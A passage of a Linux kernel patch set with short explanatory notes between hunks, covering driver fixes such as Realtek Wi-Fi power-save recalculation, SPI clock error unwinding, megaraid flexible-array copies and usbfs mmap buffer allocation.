+ 		rtw_set_channel(rtwdev);
+ 
+@@ -206,6 +197,7 @@ static int rtw_ops_add_interface(struct ieee80211_hw *hw,
+ 	rtwvif->bcn_ctrl = bcn_ctrl;
+ 	config |= PORT_SET_BCN_CTRL;
+ 	rtw_vif_port_config(rtwdev, rtwvif, config);
++	rtw_recalc_lps(rtwdev, vif);
+ 
+ 	mutex_unlock(&rtwdev->mutex);
+ 
+@@ -236,6 +228,7 @@ static void rtw_ops_remove_interface(struct ieee80211_hw *hw,
+ 	rtwvif->bcn_ctrl = 0;
+ 	config |= PORT_SET_BCN_CTRL;
+ 	rtw_vif_port_config(rtwdev, rtwvif, config);
++	rtw_recalc_lps(rtwdev, NULL);
+ 
+ 	mutex_unlock(&rtwdev->mutex);
+ }
+@@ -428,6 +421,9 @@ static void rtw_ops_bss_info_changed(struct ieee80211_hw *hw,
+ 	if (changed & BSS_CHANGED_ERP_SLOT)
+ 		rtw_conf_tx(rtwdev, rtwvif);
+ 
++	if (changed & BSS_CHANGED_PS)
++		rtw_recalc_lps(rtwdev, NULL);
++
+ 	rtw_vif_port_config(rtwdev, rtwvif, config);
+ 
+ 	mutex_unlock(&rtwdev->mutex);
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 8080ace5ed51e..4c8164db4a9e4 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -248,8 +248,8 @@ static void rtw_watch_dog_work(struct work_struct *work)
+ 	 * more than two stations associated to the AP, then we can not enter
+ 	 * lps, because fw does not handle the overlapped beacon interval
+ 	 *
+-	 * mac80211 should iterate vifs and determine if driver can enter
+-	 * ps by passing IEEE80211_CONF_PS to us, all we need to do is to
++	 * rtw_recalc_lps() iterates vifs and determines if the driver can enter
++	 * ps by vif->type and vif->cfg.ps, all we need to do here is to
+ 	 * get that vif and check if device is having traffic more than the
+ 	 * threshold.
+ 	 */
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.c b/drivers/net/wireless/realtek/rtw88/ps.c
+index dc0d852182454..7ac35c368d7a5 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.c
++++ b/drivers/net/wireless/realtek/rtw88/ps.c
+@@ -299,3 +299,46 @@ void rtw_leave_lps_deep(struct rtw_dev *rtwdev)
+ 
+ 	__rtw_leave_lps_deep(rtwdev);
+ }
++
++struct rtw_vif_recalc_lps_iter_data {
++	struct rtw_dev *rtwdev;
++	struct ieee80211_vif *found_vif;
++	int count;
++};
++
++static void __rtw_vif_recalc_lps(struct rtw_vif_recalc_lps_iter_data *data,
++				 struct ieee80211_vif *vif)
++{
++	if (data->count < 0)
++		return;
++
++	if (vif->type != NL80211_IFTYPE_STATION) {
++		data->count = -1;
++		return;
++	}
++
++	data->count++;
++	data->found_vif = vif;
++}
++
++static void rtw_vif_recalc_lps_iter(void *data, u8 *mac,
++				    struct ieee80211_vif *vif)
++{
++	__rtw_vif_recalc_lps(data, vif);
++}
++
++void rtw_recalc_lps(struct rtw_dev *rtwdev, struct ieee80211_vif *new_vif)
++{
++	struct rtw_vif_recalc_lps_iter_data data = { .rtwdev = rtwdev };
++
++	if (new_vif)
++		__rtw_vif_recalc_lps(&data, new_vif);
++	rtw_iterate_vifs(rtwdev, rtw_vif_recalc_lps_iter, &data);
++
++	if (data.count == 1 && data.found_vif->cfg.ps) {
++		rtwdev->ps_enabled = true;
++	} else {
++		rtwdev->ps_enabled = false;
++		rtw_leave_lps(rtwdev);
++	}
++}
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.h b/drivers/net/wireless/realtek/rtw88/ps.h
+index c194386f6db53..5ae83d2526cfd 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.h
++++ b/drivers/net/wireless/realtek/rtw88/ps.h
+@@ -23,4 +23,6 @@ void rtw_enter_lps(struct rtw_dev *rtwdev, u8 port_id);
+ void rtw_leave_lps(struct rtw_dev *rtwdev);
+ void rtw_leave_lps_deep(struct rtw_dev *rtwdev);
+ enum rtw_lps_deep_mode rtw_get_lps_deep_mode(struct rtw_dev *rtwdev);
++void rtw_recalc_lps(struct rtw_dev *rtwdev, struct ieee80211_vif *new_vif);
++
+ #endif
+diff --git a/drivers/net/wireless/realtek/rtw89/mac80211.c b/drivers/net/wireless/realtek/rtw89/mac80211.c
+index a296bfa8188f2..a8f478f0cde90 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw89/mac80211.c
+@@ -78,15 +78,6 @@ static int rtw89_ops_config(struct ieee80211_hw *hw, u32 changed)
+ 	    !(hw->conf.flags & IEEE80211_CONF_IDLE))
+ 		rtw89_leave_ips(rtwdev);
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_PS) {
+-		if (hw->conf.flags & IEEE80211_CONF_PS) {
+-			rtwdev->lps_enabled = true;
+-		} else {
+-			rtw89_leave_lps(rtwdev);
+-			rtwdev->lps_enabled = false;
+-		}
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL) {
+ 		rtw89_config_entity_chandef(rtwdev, RTW89_SUB_ENTITY_0,
+ 					    &hw->conf.chandef);
+@@ -142,6 +133,8 @@ static int rtw89_ops_add_interface(struct ieee80211_hw *hw,
+ 	rtw89_core_txq_init(rtwdev, vif->txq);
+ 
+ 	rtw89_btc_ntfy_role_info(rtwdev, rtwvif, NULL, BTC_ROLE_START);
++
++	rtw89_recalc_lps(rtwdev);
+ out:
+ 	mutex_unlock(&rtwdev->mutex);
+ 
+@@ -165,6 +158,8 @@ static void rtw89_ops_remove_interface(struct ieee80211_hw *hw,
+ 	rtw89_mac_remove_vif(rtwdev, rtwvif);
+ 	rtw89_core_release_bit_map(rtwdev->hw_port, rtwvif->port);
+ 	list_del_init(&rtwvif->list);
++	rtw89_recalc_lps(rtwdev);
++
+ 	mutex_unlock(&rtwdev->mutex);
+ }
+ 
+@@ -411,6 +406,9 @@ static void rtw89_ops_bss_info_changed(struct ieee80211_hw *hw,
+ 	if (changed & BSS_CHANGED_P2P_PS)
+ 		rtw89_process_p2p_ps(rtwdev, vif);
+ 
++	if (changed & BSS_CHANGED_PS)
++		rtw89_recalc_lps(rtwdev);
++
+ 	mutex_unlock(&rtwdev->mutex);
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/ps.c b/drivers/net/wireless/realtek/rtw89/ps.c
+index bf41a11416792..7cf9f80c7a93c 100644
+--- a/drivers/net/wireless/realtek/rtw89/ps.c
++++ b/drivers/net/wireless/realtek/rtw89/ps.c
+@@ -244,3 +244,29 @@ void rtw89_process_p2p_ps(struct rtw89_dev *rtwdev, struct ieee80211_vif *vif)
+ 	rtw89_p2p_disable_all_noa(rtwdev, vif);
+ 	rtw89_p2p_update_noa(rtwdev, vif);
+ }
++
++void rtw89_recalc_lps(struct rtw89_dev *rtwdev)
++{
++	struct ieee80211_vif *vif, *found_vif = NULL;
++	struct rtw89_vif *rtwvif;
++	int count = 0;
++
++	rtw89_for_each_rtwvif(rtwdev, rtwvif) {
++		vif = rtwvif_to_vif(rtwvif);
++
++		if (vif->type != NL80211_IFTYPE_STATION) {
++			count = 0;
++			break;
++		}
++
++		count++;
++		found_vif = vif;
++	}
++
++	if (count == 1 && found_vif->cfg.ps) {
++		rtwdev->lps_enabled = true;
++	} else {
++		rtw89_leave_lps(rtwdev);
++		rtwdev->lps_enabled = false;
++	}
++}
+diff --git a/drivers/net/wireless/realtek/rtw89/ps.h b/drivers/net/wireless/realtek/rtw89/ps.h
+index 0feae39916238..49fb9d8b65466 100644
+--- a/drivers/net/wireless/realtek/rtw89/ps.h
++++ b/drivers/net/wireless/realtek/rtw89/ps.h
+@@ -13,5 +13,6 @@ void rtw89_enter_ips(struct rtw89_dev *rtwdev);
+ void rtw89_leave_ips(struct rtw89_dev *rtwdev);
+ void rtw89_set_coex_ctrl_lps(struct rtw89_dev *rtwdev, bool btc_ctrl);
+ void rtw89_process_p2p_ps(struct rtw89_dev *rtwdev, struct ieee80211_vif *vif);
++void rtw89_recalc_lps(struct rtw89_dev *rtwdev);
+ 
+ #endif
+diff --git a/drivers/pinctrl/meson/pinctrl-meson-axg.c b/drivers/pinctrl/meson/pinctrl-meson-axg.c
+index 7bfecdfba1779..d249a035c2b9b 100644
+--- a/drivers/pinctrl/meson/pinctrl-meson-axg.c
++++ b/drivers/pinctrl/meson/pinctrl-meson-axg.c
+@@ -400,6 +400,7 @@ static struct meson_pmx_group meson_axg_periphs_groups[] = {
+ 	GPIO_GROUP(GPIOA_15),
+ 	GPIO_GROUP(GPIOA_16),
+ 	GPIO_GROUP(GPIOA_17),
++	GPIO_GROUP(GPIOA_18),
+ 	GPIO_GROUP(GPIOA_19),
+ 	GPIO_GROUP(GPIOA_20),
+ 
+diff --git a/drivers/platform/surface/aggregator/controller.c b/drivers/platform/surface/aggregator/controller.c
+index c6537a1b3a2ec..30cea324ff95f 100644
+--- a/drivers/platform/surface/aggregator/controller.c
++++ b/drivers/platform/surface/aggregator/controller.c
+@@ -825,7 +825,7 @@ static int ssam_cplt_init(struct ssam_cplt *cplt, struct device *dev)
+ 
+ 	cplt->dev = dev;
+ 
+-	cplt->wq = create_workqueue(SSAM_CPLT_WQ_NAME);
++	cplt->wq = alloc_workqueue(SSAM_CPLT_WQ_NAME, WQ_UNBOUND | WQ_MEM_RECLAIM, 0);
+ 	if (!cplt->wq)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/platform/surface/surface_aggregator_tabletsw.c b/drivers/platform/surface/surface_aggregator_tabletsw.c
+index 27d95a6a78513..af8b547cffdc6 100644
+--- a/drivers/platform/surface/surface_aggregator_tabletsw.c
++++ b/drivers/platform/surface/surface_aggregator_tabletsw.c
+@@ -201,6 +201,7 @@ enum ssam_kip_cover_state {
+ 	SSAM_KIP_COVER_STATE_LAPTOP        = 0x03,
+ 	SSAM_KIP_COVER_STATE_FOLDED_CANVAS = 0x04,
+ 	SSAM_KIP_COVER_STATE_FOLDED_BACK   = 0x05,
++	SSAM_KIP_COVER_STATE_BOOK          = 0x06,
+ };
+ 
+ static const char *ssam_kip_cover_state_name(struct ssam_tablet_sw *sw, u32 state)
+@@ -221,6 +222,9 @@ static const char *ssam_kip_cover_state_name(struct ssam_tablet_sw *sw, u32 stat
+ 	case SSAM_KIP_COVER_STATE_FOLDED_BACK:
+ 		return "folded-back";
+ 
++	case SSAM_KIP_COVER_STATE_BOOK:
++		return "book";
++
+ 	default:
+ 		dev_warn(&sw->sdev->dev, "unknown KIP cover state: %u\n", state);
+ 		return "<unknown>";
+@@ -233,6 +237,7 @@ static bool ssam_kip_cover_state_is_tablet_mode(struct ssam_tablet_sw *sw, u32 s
+ 	case SSAM_KIP_COVER_STATE_DISCONNECTED:
+ 	case SSAM_KIP_COVER_STATE_FOLDED_CANVAS:
+ 	case SSAM_KIP_COVER_STATE_FOLDED_BACK:
++	case SSAM_KIP_COVER_STATE_BOOK:
+ 		return true;
+ 
+ 	case SSAM_KIP_COVER_STATE_CLOSED:
+diff --git a/drivers/s390/block/dasd_ioctl.c b/drivers/s390/block/dasd_ioctl.c
+index 9327dcdd6e5e4..8fca725b3daec 100644
+--- a/drivers/s390/block/dasd_ioctl.c
++++ b/drivers/s390/block/dasd_ioctl.c
+@@ -552,10 +552,10 @@ static int __dasd_ioctl_information(struct dasd_block *block,
+ 
+ 	memcpy(dasd_info->type, base->discipline->name, 4);
+ 
+-	spin_lock_irqsave(&block->queue_lock, flags);
++	spin_lock_irqsave(get_ccwdev_lock(base->cdev), flags);
+ 	list_for_each(l, &base->ccw_queue)
+ 		dasd_info->chanq_len++;
+-	spin_unlock_irqrestore(&block->queue_lock, flags);
++	spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.c b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+index af22ffa8f6a25..1475f3e259c10 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+@@ -3323,7 +3323,7 @@ static void megasas_prepare_secondRaid1_IO(struct megasas_instance *instance,
+ 	/* copy the io request frame as well as 8 SGEs data for r1 command*/
+ 	memcpy(r1_cmd->io_request, cmd->io_request,
+ 	       (sizeof(struct MPI2_RAID_SCSI_IO_REQUEST)));
+-	memcpy(&r1_cmd->io_request->SGL, &cmd->io_request->SGL,
++	memcpy(r1_cmd->io_request->SGLs, cmd->io_request->SGLs,
+ 	       (fusion->max_sge_in_main_msg * sizeof(union MPI2_SGE_IO_UNION)));
+ 	/*sense buffer is different for r1 command*/
+ 	r1_cmd->io_request->SenseBufferLowAddress =
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.h b/drivers/scsi/megaraid/megaraid_sas_fusion.h
+index 49e9a9048ee7e..b677d80e58747 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.h
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.h
+@@ -526,7 +526,10 @@ struct MPI2_RAID_SCSI_IO_REQUEST {
+ 	__le32			Control;                        /* 0x3C */
+ 	union MPI2_SCSI_IO_CDB_UNION  CDB;			/* 0x40 */
+ 	union RAID_CONTEXT_UNION RaidContext;  /* 0x60 */
+-	union MPI2_SGE_IO_UNION       SGL;			/* 0x80 */
++	union {
++		union MPI2_SGE_IO_UNION       SGL;		/* 0x80 */
++		DECLARE_FLEX_ARRAY(union MPI2_SGE_IO_UNION, SGLs);
++	};
+ };
+ 
+ /*
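The union added to MPI2_RAID_SCSI_IO_REQUEST exists for FORTIFY_SOURCE: copying several SGEs through the single-element SGL member looks like a buffer overflow to the fortified memcpy(), while a flexible-array alias of the same storage may legally extend to the end of the allocation. The idiom, sketched with hypothetical types:

    #include <linux/stddef.h>
    #include <linux/types.h>

    struct io_req {
        u32 header;
        union {
            u64 sgl;                       /* legacy fixed-size view */
            DECLARE_FLEX_ARRAY(u64, sgls); /* same bytes, unbounded  */
        };
    };

    /* memcpy(dst->sgls, src->sgls, n * sizeof(u64)) now targets a
     * flexible-array member and passes the compile-time bounds check */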
+diff --git a/drivers/soc/qcom/icc-bwmon.c b/drivers/soc/qcom/icc-bwmon.c
+index d07be3700db60..7829549993c92 100644
+--- a/drivers/soc/qcom/icc-bwmon.c
++++ b/drivers/soc/qcom/icc-bwmon.c
+@@ -603,12 +603,12 @@ static int bwmon_probe(struct platform_device *pdev)
+ 	bwmon->max_bw_kbps = UINT_MAX;
+ 	opp = dev_pm_opp_find_bw_floor(dev, &bwmon->max_bw_kbps, 0);
+ 	if (IS_ERR(opp))
+-		return dev_err_probe(dev, ret, "failed to find max peak bandwidth\n");
++		return dev_err_probe(dev, PTR_ERR(opp), "failed to find max peak bandwidth\n");
+ 
+ 	bwmon->min_bw_kbps = 0;
+ 	opp = dev_pm_opp_find_bw_ceil(dev, &bwmon->min_bw_kbps, 0);
+ 	if (IS_ERR(opp))
+-		return dev_err_probe(dev, ret, "failed to find min peak bandwidth\n");
++		return dev_err_probe(dev, PTR_ERR(opp), "failed to find min peak bandwidth\n");
+ 
+ 	bwmon->dev = dev;
+ 
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index bd502368339e5..b10ea69a638e1 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -2019,8 +2019,10 @@ int sdw_stream_add_slave(struct sdw_slave *slave,
+ 
+ skip_alloc_master_rt:
+ 	s_rt = sdw_slave_rt_find(slave, stream);
+-	if (s_rt)
++	if (s_rt) {
++		alloc_slave_rt = false;
+ 		goto skip_alloc_slave_rt;
++	}
+ 
+ 	s_rt = sdw_slave_rt_alloc(slave, m_rt);
+ 	if (!s_rt) {
+diff --git a/drivers/spi/spi-mt65xx.c b/drivers/spi/spi-mt65xx.c
+index 9eab6c20dbc56..6e95efb50acbc 100644
+--- a/drivers/spi/spi-mt65xx.c
++++ b/drivers/spi/spi-mt65xx.c
+@@ -1275,6 +1275,9 @@ static int mtk_spi_remove(struct platform_device *pdev)
+ 	struct mtk_spi *mdata = spi_master_get_devdata(master);
+ 	int ret;
+ 
++	if (mdata->use_spimem && !completion_done(&mdata->spimem_done))
++		complete(&mdata->spimem_done);
++
+ 	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/spi/spi-qup.c b/drivers/spi/spi-qup.c
+index 205e54f157b4a..fb6b7738b4f55 100644
+--- a/drivers/spi/spi-qup.c
++++ b/drivers/spi/spi-qup.c
+@@ -1029,23 +1029,8 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = clk_prepare_enable(cclk);
+-	if (ret) {
+-		dev_err(dev, "cannot enable core clock\n");
+-		return ret;
+-	}
+-
+-	ret = clk_prepare_enable(iclk);
+-	if (ret) {
+-		clk_disable_unprepare(cclk);
+-		dev_err(dev, "cannot enable iface clock\n");
+-		return ret;
+-	}
+-
+ 	master = spi_alloc_master(dev, sizeof(struct spi_qup));
+ 	if (!master) {
+-		clk_disable_unprepare(cclk);
+-		clk_disable_unprepare(iclk);
+ 		dev_err(dev, "cannot allocate master\n");
+ 		return -ENOMEM;
+ 	}
+@@ -1093,6 +1078,19 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 	spin_lock_init(&controller->lock);
+ 	init_completion(&controller->done);
+ 
++	ret = clk_prepare_enable(cclk);
++	if (ret) {
++		dev_err(dev, "cannot enable core clock\n");
++		goto error_dma;
++	}
++
++	ret = clk_prepare_enable(iclk);
++	if (ret) {
++		clk_disable_unprepare(cclk);
++		dev_err(dev, "cannot enable iface clock\n");
++		goto error_dma;
++	}
++
+ 	iomode = readl_relaxed(base + QUP_IO_M_MODES);
+ 
+ 	size = QUP_IO_M_OUTPUT_BLOCK_SIZE(iomode);
+@@ -1122,7 +1120,7 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 	ret = spi_qup_set_state(controller, QUP_STATE_RESET);
+ 	if (ret) {
+ 		dev_err(dev, "cannot set RESET state\n");
+-		goto error_dma;
++		goto error_clk;
+ 	}
+ 
+ 	writel_relaxed(0, base + QUP_OPERATIONAL);
+@@ -1146,7 +1144,7 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 	ret = devm_request_irq(dev, irq, spi_qup_qup_irq,
+ 			       IRQF_TRIGGER_HIGH, pdev->name, controller);
+ 	if (ret)
+-		goto error_dma;
++		goto error_clk;
+ 
+ 	pm_runtime_set_autosuspend_delay(dev, MSEC_PER_SEC);
+ 	pm_runtime_use_autosuspend(dev);
+@@ -1161,11 +1159,12 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 
+ disable_pm:
+ 	pm_runtime_disable(&pdev->dev);
++error_clk:
++	clk_disable_unprepare(cclk);
++	clk_disable_unprepare(iclk);
+ error_dma:
+ 	spi_qup_release_dma(master);
+ error:
+-	clk_disable_unprepare(cclk);
+-	clk_disable_unprepare(iclk);
+ 	spi_master_put(master);
+ 	return ret;
+ }
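The spi-qup fix is the standard probe() unwinding rule: acquire resources in order, and make each error label release exactly what was acquired before the failing step, in reverse order. Since the clocks are now enabled after the DMA setup, a clock failure jumps to error_dma and later failures jump to the new error_clk. A generic sketch with hypothetical acquire/release helpers:

    int acquire_a(void); void release_a(void);   /* hypothetical */
    int acquire_b(void); void release_b(void);
    int acquire_c(void);

    static int my_probe(void)
    {
        int ret;

        ret = acquire_a();
        if (ret)
            return ret;     /* nothing to undo yet */

        ret = acquire_b();
        if (ret)
            goto err_a;     /* undo only A */

        ret = acquire_c();
        if (ret)
            goto err_b;     /* undo B, then A */

        return 0;

    err_b:
        release_b();
    err_a:
        release_a();
        return ret;
    }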
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index 7e11364d718bf..c1e50084172d8 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -48,9 +48,9 @@ static const struct rtl819x_ops rtl819xp_ops = {
+ };
+ 
+ static struct pci_device_id rtl8192_pci_id_tbl[] = {
+-	{PCI_DEVICE(0x10ec, 0x8192)},
+-	{PCI_DEVICE(0x07aa, 0x0044)},
+-	{PCI_DEVICE(0x07aa, 0x0047)},
++	{RTL_PCI_DEVICE(0x10ec, 0x8192, rtl819xp_ops)},
++	{RTL_PCI_DEVICE(0x07aa, 0x0044, rtl819xp_ops)},
++	{RTL_PCI_DEVICE(0x07aa, 0x0047, rtl819xp_ops)},
+ 	{}
+ };
+ 
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+index 50f1ec78cc457..7021f9c435d96 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+@@ -55,6 +55,11 @@
+ #define IS_HARDWARE_TYPE_8192SE(_priv)		\
+ 	(((struct r8192_priv *)rtllib_priv(dev))->card_8192 == NIC_8192SE)
+ 
++#define RTL_PCI_DEVICE(vend, dev, cfg) \
++	.vendor = (vend), .device = (dev), \
++	.subvendor = PCI_ANY_ID, .subdevice = PCI_ANY_ID, \
++	.driver_data = (kernel_ulong_t)&(cfg)
++
+ #define TOTAL_CAM_ENTRY		32
+ #define CAM_CONTENT_COUNT	8
+ 
+diff --git a/drivers/tee/amdtee/amdtee_if.h b/drivers/tee/amdtee/amdtee_if.h
+index ff48c3e473750..e2014e21530ac 100644
+--- a/drivers/tee/amdtee/amdtee_if.h
++++ b/drivers/tee/amdtee/amdtee_if.h
+@@ -118,16 +118,18 @@ struct tee_cmd_unmap_shared_mem {
+ 
+ /**
+  * struct tee_cmd_load_ta - load Trusted Application (TA) binary into TEE
+- * @low_addr:    [in] bits [31:0] of the physical address of the TA binary
+- * @hi_addr:     [in] bits [63:32] of the physical address of the TA binary
+- * @size:        [in] size of TA binary in bytes
+- * @ta_handle:   [out] return handle of the loaded TA
++ * @low_addr:       [in] bits [31:0] of the physical address of the TA binary
++ * @hi_addr:        [in] bits [63:32] of the physical address of the TA binary
++ * @size:           [in] size of TA binary in bytes
++ * @ta_handle:      [out] return handle of the loaded TA
++ * @return_origin:  [out] origin of return code after TEE processing
+  */
+ struct tee_cmd_load_ta {
+ 	u32 low_addr;
+ 	u32 hi_addr;
+ 	u32 size;
+ 	u32 ta_handle;
++	u32 return_origin;
+ };
+ 
+ /**
+diff --git a/drivers/tee/amdtee/call.c b/drivers/tee/amdtee/call.c
+index cec6e70f0ac92..8a02c5fe33a6b 100644
+--- a/drivers/tee/amdtee/call.c
++++ b/drivers/tee/amdtee/call.c
+@@ -423,19 +423,23 @@ int handle_load_ta(void *data, u32 size, struct tee_ioctl_open_session_arg *arg)
+ 	if (ret) {
+ 		arg->ret_origin = TEEC_ORIGIN_COMMS;
+ 		arg->ret = TEEC_ERROR_COMMUNICATION;
+-	} else if (arg->ret == TEEC_SUCCESS) {
+-		ret = get_ta_refcount(load_cmd.ta_handle);
+-		if (!ret) {
+-			arg->ret_origin = TEEC_ORIGIN_COMMS;
+-			arg->ret = TEEC_ERROR_OUT_OF_MEMORY;
+-
+-			/* Unload the TA on error */
+-			unload_cmd.ta_handle = load_cmd.ta_handle;
+-			psp_tee_process_cmd(TEE_CMD_ID_UNLOAD_TA,
+-					    (void *)&unload_cmd,
+-					    sizeof(unload_cmd), &ret);
+-		} else {
+-			set_session_id(load_cmd.ta_handle, 0, &arg->session);
++	} else {
++		arg->ret_origin = load_cmd.return_origin;
++
++		if (arg->ret == TEEC_SUCCESS) {
++			ret = get_ta_refcount(load_cmd.ta_handle);
++			if (!ret) {
++				arg->ret_origin = TEEC_ORIGIN_COMMS;
++				arg->ret = TEEC_ERROR_OUT_OF_MEMORY;
++
++				/* Unload the TA on error */
++				unload_cmd.ta_handle = load_cmd.ta_handle;
++				psp_tee_process_cmd(TEE_CMD_ID_UNLOAD_TA,
++						    (void *)&unload_cmd,
++						    sizeof(unload_cmd), &ret);
++			} else {
++				set_session_id(load_cmd.ta_handle, 0, &arg->session);
++			}
+ 		}
+ 	}
+ 	mutex_unlock(&ta_refcount_mutex);
+diff --git a/drivers/usb/core/buffer.c b/drivers/usb/core/buffer.c
+index fbb087b728dc9..268ccbec88f95 100644
+--- a/drivers/usb/core/buffer.c
++++ b/drivers/usb/core/buffer.c
+@@ -172,3 +172,44 @@ void hcd_buffer_free(
+ 	}
+ 	dma_free_coherent(hcd->self.sysdev, size, addr, dma);
+ }
++
++void *hcd_buffer_alloc_pages(struct usb_hcd *hcd,
++		size_t size, gfp_t mem_flags, dma_addr_t *dma)
++{
++	if (size == 0)
++		return NULL;
++
++	if (hcd->localmem_pool)
++		return gen_pool_dma_alloc_align(hcd->localmem_pool,
++				size, dma, PAGE_SIZE);
++
++	/* some USB hosts just use PIO */
++	if (!hcd_uses_dma(hcd)) {
++		*dma = DMA_MAPPING_ERROR;
++		return (void *)__get_free_pages(mem_flags,
++				get_order(size));
++	}
++
++	return dma_alloc_coherent(hcd->self.sysdev,
++			size, dma, mem_flags);
++}
++
++void hcd_buffer_free_pages(struct usb_hcd *hcd,
++		size_t size, void *addr, dma_addr_t dma)
++{
++	if (!addr)
++		return;
++
++	if (hcd->localmem_pool) {
++		gen_pool_free(hcd->localmem_pool,
++				(unsigned long)addr, size);
++		return;
++	}
++
++	if (!hcd_uses_dma(hcd)) {
++		free_pages((unsigned long)addr, get_order(size));
++		return;
++	}
++
++	dma_free_coherent(hcd->self.sysdev, size, addr, dma);
++}
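hcd_buffer_alloc_pages() has three backends (local memory pool, plain pages for PIO-only hosts, dma_alloc_coherent()) and signals the PIO case through the DMA_MAPPING_ERROR sentinel rather than through hcd flags. A sketch of the calling convention the devio.c hunk below depends on:

    dma_addr_t dma = DMA_MAPPING_ERROR;
    void *mem;

    mem = hcd_buffer_alloc_pages(hcd, size, GFP_USER | __GFP_NOWARN, &dma);
    if (!mem)
        return -ENOMEM;

    if (dma == DMA_MAPPING_ERROR) {
        /* plain pages: mmap them with remap_pfn_range() */
    } else {
        /* coherent DMA memory: mmap with dma_mmap_coherent() */
    }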
+diff --git a/drivers/usb/core/devio.c b/drivers/usb/core/devio.c
+index 837f3e57f5809..984de3f5e8eb9 100644
+--- a/drivers/usb/core/devio.c
++++ b/drivers/usb/core/devio.c
+@@ -186,6 +186,7 @@ static int connected(struct usb_dev_state *ps)
+ static void dec_usb_memory_use_count(struct usb_memory *usbm, int *count)
+ {
+ 	struct usb_dev_state *ps = usbm->ps;
++	struct usb_hcd *hcd = bus_to_hcd(ps->dev->bus);
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&ps->lock, flags);
+@@ -194,8 +195,8 @@ static void dec_usb_memory_use_count(struct usb_memory *usbm, int *count)
+ 		list_del(&usbm->memlist);
+ 		spin_unlock_irqrestore(&ps->lock, flags);
+ 
+-		usb_free_coherent(ps->dev, usbm->size, usbm->mem,
+-				usbm->dma_handle);
++		hcd_buffer_free_pages(hcd, usbm->size,
++				usbm->mem, usbm->dma_handle);
+ 		usbfs_decrease_memory_usage(
+ 			usbm->size + sizeof(struct usb_memory));
+ 		kfree(usbm);
+@@ -234,7 +235,7 @@ static int usbdev_mmap(struct file *file, struct vm_area_struct *vma)
+ 	size_t size = vma->vm_end - vma->vm_start;
+ 	void *mem;
+ 	unsigned long flags;
+-	dma_addr_t dma_handle;
++	dma_addr_t dma_handle = DMA_MAPPING_ERROR;
+ 	int ret;
+ 
+ 	ret = usbfs_increase_memory_usage(size + sizeof(struct usb_memory));
+@@ -247,8 +248,8 @@ static int usbdev_mmap(struct file *file, struct vm_area_struct *vma)
+ 		goto error_decrease_mem;
+ 	}
+ 
+-	mem = usb_alloc_coherent(ps->dev, size, GFP_USER | __GFP_NOWARN,
+-			&dma_handle);
++	mem = hcd_buffer_alloc_pages(hcd,
++			size, GFP_USER | __GFP_NOWARN, &dma_handle);
+ 	if (!mem) {
+ 		ret = -ENOMEM;
+ 		goto error_free_usbm;
+@@ -264,7 +265,14 @@ static int usbdev_mmap(struct file *file, struct vm_area_struct *vma)
+ 	usbm->vma_use_count = 1;
+ 	INIT_LIST_HEAD(&usbm->memlist);
+ 
+-	if (hcd->localmem_pool || !hcd_uses_dma(hcd)) {
++	/*
++	 * In DMA-unavailable cases, hcd_buffer_alloc_pages allocates
++	 * normal pages and assigns DMA_MAPPING_ERROR to dma_handle. Check
++	 * whether we are in such cases, and then use remap_pfn_range (or
++	 * dma_mmap_coherent) to map normal (or DMA) pages into the user
++	 * space, respectively.
++	 */
++	if (dma_handle == DMA_MAPPING_ERROR) {
+ 		if (remap_pfn_range(vma, vma->vm_start,
+ 				    virt_to_phys(usbm->mem) >> PAGE_SHIFT,
+ 				    size, vma->vm_page_prot) < 0) {
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index 31017ebc4d7c7..72f924ec4658d 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -1443,6 +1443,9 @@ static bool vduse_validate_config(struct vduse_dev_config *config)
+ 	if (config->vq_num > 0xffff)
+ 		return false;
+ 
++	if (!config->name[0])
++		return false;
++
+ 	if (!device_is_allowed(config->device_id))
+ 		return false;
+ 
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index 6f532da59e08a..d591f77961aa8 100644
+--- a/drivers/vhost/vdpa.c
